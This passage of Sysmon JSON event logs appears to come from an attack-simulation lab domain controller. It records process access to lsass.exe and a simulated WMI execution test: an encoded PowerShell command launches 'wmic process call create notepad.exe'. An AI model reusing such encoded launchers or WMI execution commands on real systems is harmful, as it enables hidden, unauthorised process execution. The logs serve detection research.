C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.112","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+602b3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+602b3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nProcessGuid: {41C8662E-20D6-5F25-0000-00108FD30800}\r\nProcessId: 5068\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process call create notepad.exe\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","ProcessGuid":"{41C8662E-20D6-5F25-0000-00108FD30800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process call create notepad.exe\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.284\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00108FD30800}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.284","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00108FD30800}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
